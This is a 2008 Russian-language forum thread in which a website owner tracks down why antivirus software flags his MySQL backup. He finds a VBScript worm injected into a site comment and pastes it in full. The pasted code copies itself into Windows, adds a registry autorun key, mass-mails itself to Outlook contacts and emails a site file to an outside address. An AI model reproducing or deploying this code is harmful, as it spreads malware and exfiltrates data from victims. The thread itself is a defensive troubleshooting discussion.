Altornes102 0 Опубликовано: 4 июля 2008 Рассказать Опубликовано: 4 июля 2008 (изменено) Добрый вечер. Извините, возможно, чуть-чуть не по теме, но не знаю более подходящего места... Итак, очень надоело то, что на сайт не заходит Оперой 9.50, пишет что сайт содержит вирусы. Насчет того, что в файлах нет никаких вирусов я уверен на 100%. Письма в службу поддержки не дают результата - сайт по прежнему недоступен из последней версии Оперы... Сегодня СКАЧАЛ резервную копию базы данных и при попытке открыть файл (.sql) , начал ругаться NOD, мол в этом .sql файле какой-то неизвестный скрипт-вирус, и он хочет получить доступ к Explorer.exe.. Вообще в голове не помещаеться как такое возможно, но полазив по интернету нашел вот эту новость _http://eplus.com.ua/news/sql_2008-04-24-14-00-08.html (Кстати, возьмите к сведению и проверьте свою базу) Ну и конечно, я в первую очередь начал искать в SQL файле зловредный код... Пробовал вводить <srpipt , .js , 1.js , iframe но находит все свое - родное... А файл то большой - 200 мб. Собственно сам вопрос: Как найти зловредный код в мускуле? Ведь код может быть разным, нужно же ведь знать что искать.... Помогите, пожалуйста! Изменено 4 июля 2008 пользователем Altornes102 Цитата Ссылка на сообщение Поделиться на других сайтах
IT-Security 33 Опубликовано: 5 июля 2008 Рассказать Опубликовано: 5 июля 2008 Могу попробовать "вылечить" базу, если это вообще возможно. Не бесплатно. Цитата Ссылка на сообщение Поделиться на других сайтах
ShVad 2 Опубликовано: 5 июля 2008 Рассказать Опубликовано: 5 июля 2008 IT-Security, Как в текстовом файле может быть вирус?? Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 5 июля 2008 Рассказать Опубликовано: 5 июля 2008 Как в текстовом файле может быть вирус?а ты качни шелл от рст (текстовый файл) и натрави на него антивирус - будет ругаться Цитата Ссылка на сообщение Поделиться на других сайтах
orenlab 0 Опубликовано: 5 июля 2008 Рассказать Опубликовано: 5 июля 2008 IT-Security, Как в текстовом файле может быть вирус?? Посмотри логи сервера, отсортируй бота с юзер-агентом libwww-perl (там еще версия присутствует) и открой те ссылки которые он пытается проинклудить - столько интересного увидишь и наслушаешься от своего антивиря. Цитата Ссылка на сообщение Поделиться на других сайтах
Altornes102 0 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 (изменено) Автор Добрый день! Вобщем я решил попробовать такой метод: Открыл бэкап базы (.sql) и начал удалять таблицы и проверять после каждого удаления антивирусом. Сначала удалил dle_post. Проверил - есть вирус. Потом удалил dle_comments, проверил оставшееся - есть. Короче таким методом дошел до того, что когда удаляю самую первую строчку: #SKD101|название_базы|25|2008.07.04 16:06:35|187040|60|18|48|73149|9|1|2|73153|3|18565|5|347|73123|348|1|5|5|21573|1 |4|1528 , то вируса нет.. Мне кажеться что она создаеться только тогда, когда делаешь бэкап, или я ошибаюсь? Но интересно еще то, что когда удаляю все, а оставляю только одну эту строчку, то антивирусник не ругаеться.... Может это закодированная херня какая-то? Если да, то помогите раскодировать строчку. Спасибо! Изменено 6 июля 2008 пользователем Altornes102 Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 Сначала удалил dle_post. Проверил - есть вирус. Потом удалил dle_comments, проверил оставшееся - есть.каким образом проверял и что конкретно говорил антивирус? Цитата Ссылка на сообщение Поделиться на других сайтах
Altornes102 0 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 (изменено) Автор После долгих поисков все-таки нашел!!! Нашло в комментариях.... Где-то 5-10 записей.... Вот такой вот кодик, туда посмотреть так страшно становиться что оно делает... Вобщем проверьте все свои базы на наличие это фигни... Вот он: (29784, 1150256086, 0, '2008-01-14 01:38:17', 'Virus', 'Virus@hack.ru', 'On Error Resume Next <br />Dim FileSysObject, File <br />Set FileSysObject = CreateObject (\\"Scripting.FileSystemObject\\") <br />Set File = FileSysObject.GetFile(WScript.ScriptFullName) <br />Dim OutlookObject, OutMail, Index <br />Set OutlookObject = CreateObject(\\"Outlook.Application\\") <br />For Index = 1 To 50 <br />Set OutMail = OutlookObject.CreateItem(0) <br />OutMail.to = OutlookObject.GetNameSpace(\\"MAPI\\").AddressLists(1).AddressEntries(Index) <br />OutMail.Subject = \\"FUCK YOU ZVER\\" <br />OutMail.Body = \\"FUCK YOU ZVER\\" <br />OutMail.Attachments.Add(File) <br />OutMail.Send <br />Next <br /><br /><br />On Error Resume Next <br />Dim FileSysObject, File <br />Set FileSysObject = CreateObject (\\"Scripting.FileSystemObject\\") <br />Set File = FileSysObject.GetFile(WScript.ScriptFullName) <br />File.Copy (\\"c:\\\\windows\\\\I_am_virus.vbs\\") <br />Dim WshShell <br />Set WshShell = WScript.CreateObject(\\"WScript.Shell\\") <br />WshShell.RegWrite \\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\ _ <br />CurrentVersion\\\\RunServices\\\\virus\\", \\"c:\\\\windows\\\\I_am_virus.vbs\\" <br />Dim OutlookObject, OutMail, Index <br />Set OutlookObject = CreateObject(\\"Outlook.Application\\") <br />For Index = 1 To 50 <br />Set OutMail = OutlookObject.CreateItem(0) <br />OutMail.to = OutlookObject.GetNameSpace(\\"MAPI\\").AddressLists(1).AddressEntries(Index) <br />OutMail.Subject = \\"FUCK YOU ZVER\\" <br />OutMail.Body = \\"FUCK YOU ZVER\\" <br />OutMail.Attachments.Add(File) <br />OutMail.Send <br />Next <br />Set OutMail = OutlookObject.CreateItem(0) <br />OutMail.to = \\"Virus@hack.ru\\" <br />OutMail.Subject = \\"FUCK YOU ZVER\\" <br />OutMail.Body = \\"FUCK YOU ZVER\\" <br />OutMail.Attachments.Add(\\"modules.php\\") <br />OutMail.Send <br />', '151.64.241.20', 0, 1), Я просто в глубоком шоке!!!! Наверное столько пользователей потерял... ппц.. Изменено 6 июля 2008 пользователем Altornes102 Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 ооо.. это какой язык? =) Цитата Ссылка на сообщение Поделиться на других сайтах
revix.ru 0 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 антивирь ругается Цитата Ссылка на сообщение Поделиться на других сайтах
Altornes102 0 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 Автор удалите мое сообщение с кодом.. я не подумав, выложил это бл%%%ский код ггг и айпишка козла, как всегда голландская - 151.64.241.20 прокся ? ) Цитата Ссылка на сообщение Поделиться на других сайтах
empirator 0 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 антивирь ругается У меня НОД молчит... Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 revix.ru, а на что он ругается?? этот код безобиден в такой форме Цитата Ссылка на сообщение Поделиться на других сайтах
revix.ru 0 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 Цитата Ссылка на сообщение Поделиться на других сайтах
WMDrakon 20 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 Каспер молчит! Цитата Ссылка на сообщение Поделиться на других сайтах
Altornes102 0 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 Автор Вот именно так ругался и у меня, когда открывал файл бэкапа... Удалите мое сообщение с кодом на всякий пожарный! Цитата Ссылка на сообщение Поделиться на других сайтах
orenlab 0 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 Абсолютно бесполезный и неработоспособный код. Эта уязвимость давно закрыта в почтовых клиентах. Цитата Ссылка на сообщение Поделиться на других сайтах
Altornes102 0 Опубликовано: 6 июля 2008 Рассказать Опубликовано: 6 июля 2008 (изменено) Автор Абсолютно бесполезный и неработоспособный код. Эта уязвимость давно закрыта в почтовых клиентах. Меня волнует не это... больше всего волнует что сайт закрыт из последней версии оперы.. уже запарился в службу поддержки писать.. первые три раза отвечали, а потом начали игнорить. такая же лабуда как и на анекдот.ру Зы. И тему можно закрыть или удалить. спасибо всем!!!!! Проблема решена, а обсуждение зашло в тупик и не в тему Изменено 6 июля 2008 пользователем Altornes102 Цитата Ссылка на сообщение Поделиться на других сайтах
Vampir.exe 0 Опубликовано: 11 июля 2008 Рассказать Опубликовано: 11 июля 2008 Nod 3 у меня молчит O_o Цитата Ссылка на сообщение Поделиться на других сайтах
empirator 0 Опубликовано: 11 июля 2008 Рассказать Опубликовано: 11 июля 2008 NOD 2.7 ругается, 3му пофигу Цитата Ссылка на сообщение Поделиться на других сайтах
danil88 0 Опубликовано: 13 ноября 2008 Рассказать Опубликовано: 13 ноября 2008 каспер 7 тоже молчит Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.